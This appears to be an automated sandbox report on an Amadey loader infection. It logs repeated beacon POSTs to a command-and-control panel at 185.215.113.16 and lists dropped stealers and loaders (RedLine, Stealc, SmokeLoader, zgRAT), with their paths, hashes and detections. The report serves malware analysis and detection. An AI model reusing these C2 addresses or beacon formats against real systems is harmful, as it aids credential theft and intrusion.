Aug 26, 2024 23:30:05.301525116 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:06.050920010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:06.051742077 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:06.306035042 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49787	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:06.404314041 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://denfiusyvarbl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 245 Host: yosoborno.com
Aug 26, 2024 23:30:06.404314041 CEST	245	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 5d 5e c2 99 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu]^^E7W!z4sNTqBVEB0;G6E/mji]RZa_O7YIh2qfg/WhmxDn
Aug 26, 2024 23:30:07.641259909 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:30:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49788	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:06.487941027 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:07.254839897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:07.255620956 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:07.511338949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49789	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:07.627634048 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:08.546377897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:08.597115040 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:08.862112999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49790	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:09.081734896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:09.847428083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:09.931269884 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:10.185544968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49791	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:10.500746012 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:11.236005068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49793	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:11.246855974 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:12.001270056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	17:28:06
Start date:	26/08/2024
Path:	C:\Users\user\Desktop\PQ2AUndsdb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PQ2AUndsdb.exe"
Imagebase:	0xc30000
File size:	1'901'056 bytes
MD5 hash:	3D299133A21509BB0B005F7E18239517
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1298815760.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1257937192.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:28:08
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x5c0000
File size:	1'901'056 bytes
MD5 hash:	3D299133A21509BB0B005F7E18239517
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.1283323218.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.1323636516.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:31:00
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x5c0000
File size:	1'901'056 bytes
MD5 hash:	3D299133A21509BB0B005F7E18239517
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000003.1848639136.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	18:31:04
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000002001\GOLD.exe"
Imagebase:	0x170000
File size:	330'792 bytes
MD5 hash:	D6FCA3CD57293390CCF9D2BC83662DDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.1885204503.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:31:04
Start date:	26/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x8b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:31:07
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000004001\crypteda.exe"
Imagebase:	0x820000
File size:	1'104'936 bytes
MD5 hash:	8E74497AFF3B9D2DDB7E7F819DFC69BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:31:07
Start date:	26/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf90000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1926189866.0000000000479000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:31:08
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Roaming\wxfM3haI2K.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\wxfM3haI2K.exe"
Imagebase:	0xe80000
File size:	557'056 bytes
MD5 hash:	88367533C12315805C059E688E7CDFE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000000.1924581251.0000000000E82000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, Author: ditekSHen
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:31:08
Start date:	26/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:31:08
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Roaming\XBckuYbXje.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\XBckuYbXje.exe"
Imagebase:	0x740000
File size:	311'296 bytes
MD5 hash:	30F46F4476CDC27691C7FDAD1C255037
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.1925538885.0000000000742000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe, Author: Joe Security
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:31:09
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000005001\setup2.exe"
Imagebase:	0x400000
File size:	358'912 bytes
MD5 hash:	D78D85135F584E455F692923D9FEB804
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001E.00000002.2041286886.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001E.00000002.2041214532.00000000007B1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	18:31:12
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0x270000
File size:	192'000 bytes
MD5 hash:	7A02AA17200AEAC25A375F290A4B4C95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:31:15
Start date:	26/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	18:31:19
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000129001\Set-up.exe"
Imagebase:	0x400000
File size:	6'573'502 bytes
MD5 hash:	EE1442544088C8A6AC94E0A849CBCCE2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 62%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	18:31:22
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000150001\runtime.exe"
Imagebase:	0x400000
File size:	1'146'632 bytes
MD5 hash:	7ADFC6A2E7A5DAA59D291B6E434A59F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:31:22
Start date:	26/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:31:22
Start date:	26/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:31:24
Start date:	26/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000190001\XClient_protected.exe"
Imagebase:	0xdf0000
File size:	114'176 bytes
MD5 hash:	C27417453090D3CF9A3884B503D22C49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
